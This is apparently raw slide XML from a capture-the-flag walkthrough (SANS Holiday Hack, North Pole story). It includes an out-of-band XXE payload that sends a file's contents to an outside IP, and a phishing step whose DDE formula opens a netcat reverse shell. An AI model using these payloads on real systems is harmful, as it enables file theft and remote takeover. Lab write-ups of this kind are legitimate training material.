            <a:ext cx="11158013" cy="36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5-JSON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6866" name="Picture 2" descr="nsert &#10;Home &#10;Cut &#10;Copy &#10;Paste &#10;Format &#10;Page Layout &#10;Calibri (Body) &#10;Form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67" y="113121"/>
            <a:ext cx="6126294" cy="651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5 - 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890" name="Picture 2" descr="77 &#10;881 &#10;885 &#10;glø &#10;911 &#10;912 &#10;914 &#10;916 &#10;917 &#10;918 &#10;gig &#10;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176125"/>
            <a:ext cx="5718748" cy="64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9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5-JSON</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39938" name="Picture 2" descr="nsert Design Layout References &#10;Mailings &#10;BOLO &#10;Review &#10;Times New RO... &#10;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24" y="0"/>
            <a:ext cx="4512221" cy="660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5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6 -XXE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6) The North Pole engineering team has introduced an Elf as a Service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>EaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>) platform to optimize resource allocation for mission-critical Christmas engineering projects at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://eaas.northpolechristmastown.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Visit the system and retrieve instructions for accessing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> page from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>greatbook.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Then retrieve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> PDF file by following those directions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>What is the title of The Great Book page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>The Dreaded Inter-Dimensional Tornadoes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" font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2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6 - XXE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2" y="1036949"/>
            <a:ext cx="5717339" cy="5495826"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> -C -D 1080 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>alabaster_snowball@35.196.147.148</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr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10.142.0.13</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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10.142.0.13/XMLFile/Elfdata.xml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>downloaded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>the example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>xml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sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>10.142.0.13/Home/DisplayXML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>10.142.0.13/Home/CreateElfs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Elfdata.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> give to inject XXE to get file </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Evil.dtd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!ENTITY % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>stolendata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> SYSTEM "file:///c:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>greatbook.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>"&gt;&lt;!ENTITY % inception "&lt;!ENTITY &amp;#x25; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>sendit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> SYSTEM 'http://54.202.232.184:80/?%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>stolendata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>;'&gt;"&gt;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sz="1800" dirty="0" smtClean="0"/>
              <a:t>Add into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Elfdata.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> the XEE payload </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;!DOCTYPE demo [&lt;!ELEMENT demo ANY &gt;ENTITY % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>extentity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> SYSTEM "http://54.202.232.184:80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>evil.dtd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>"&gt;%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>extentity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>;%inception;%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>sendit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>;]&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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3141" y="1036950"/>
            <a:ext cx="5334802" cy="5387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ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="10"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upload the edited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Elfdata.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="10"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on EC2 start simple python server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>python 0m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SimpleHTTPServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="10"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> we get</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>35.185.118.225 - - [18/Dec/2017 14:57:13] "GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil.dtd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> HTTP/1.1" 200 -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>35.185.118.225 - - [18/Dec/2017 14:57:13] "GET /?http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eaas.northpolechristmastown.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/xMk7H1NypzAqYoKw/greatbook6.pdf HTTP/1.1" 200 -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="10"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now we know locate of the greatbook6.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Visist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webiste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="10"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download the Greatbook6.pdf </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7499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10" y="0"/>
            <a:ext cx="9905998" cy="1478570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410" y="1056904"/>
            <a:ext cx="10520156" cy="56467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5) How many infractions are required to be marked as naughty on Santa's Naughty and Nice List? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What are the names of at least six insider threat moles? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>) The North Pole engineering team has introduced an Elf as a Service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1"/>
              <a:t>EaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>) platform to optimize resource allocation for mission-critical Christmas engineering projects at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://eaas.northpolechristmastown.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Visit the system and retrieve instructions for accessing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> page from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1"/>
              <a:t>greatbook.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>. Then retrieve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> PDF file by following those directions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>What is the title of The Great Book </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>page?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Gain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>access to the EMI server through the use of a phishing attack with your access to the EWA server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Retrieve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> page from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>C:\GreatBookPage7.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>. What does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> page describe?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>8) Fetch the letter to Santa from the North Pole Elf Database at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://edb.northpolechristmastown.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Who wrote the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>letter?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>9) Which character is ultimately the villain causing the giant snowball problem. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>What is the villain's motive?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr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1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6 - XXE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41986" name="Picture 2" descr="ndex - North Pole Engin... x &#10;10.142.0.13 &#10;Most Visited v &quot;Offensive Se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9" y="1263192"/>
            <a:ext cx="5483166" cy="496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lf Display - North Pole E... x &#10;G) 10.142.0.13 &#10;/Home/DisplayXML &#10;M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38" y="631596"/>
            <a:ext cx="4431015" cy="592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4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6 - XXE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43010" name="Picture 2" descr="c2-user@kali:/tmp$ cat evil. dtd &#10;&lt;?xml O&quot; encoding=&quot;UTF-8&quot;?&gt; &#10;&lt;!ENTITY % stolendata SYSTEM &quot;file://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5" y="1206305"/>
            <a:ext cx="103155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pen &#10;?xml version=&quot;1.0&quot; &#10;demo [ &#10;demo ANY &#10;Elfdata.xml &#10;W/Desktop &#10;e &#10;o &#10;% ex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9" y="2176480"/>
            <a:ext cx="3931454" cy="42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7 - PHISH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b="1" dirty="0"/>
              <a:t>7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Retrieve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> page from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>C:\GreatBookPage7.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. What does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> page describe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Regarding the Witches of Oz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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3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7 - PHISH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54" y="977900"/>
            <a:ext cx="5881557" cy="5677423"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-C -D 1080 alabaster_snowball@35.196.147.148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etup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>browser to proxy traffic through 127.0.0.1 1080 socks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/>
              <a:t>site EWS site at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://10.142.0.5/account.html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cookie login bypass method from Challenge 4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L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ogin  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jessica.claus@northpolechristmastown.com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write email to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alabaster.snowball@northpolechristmastown.com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/>
              <a:t>create a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>docx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>forumula</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{DDEAUTO c:\\windows\\system32\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "/k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 10.142.0.11 10443 -e </a:t>
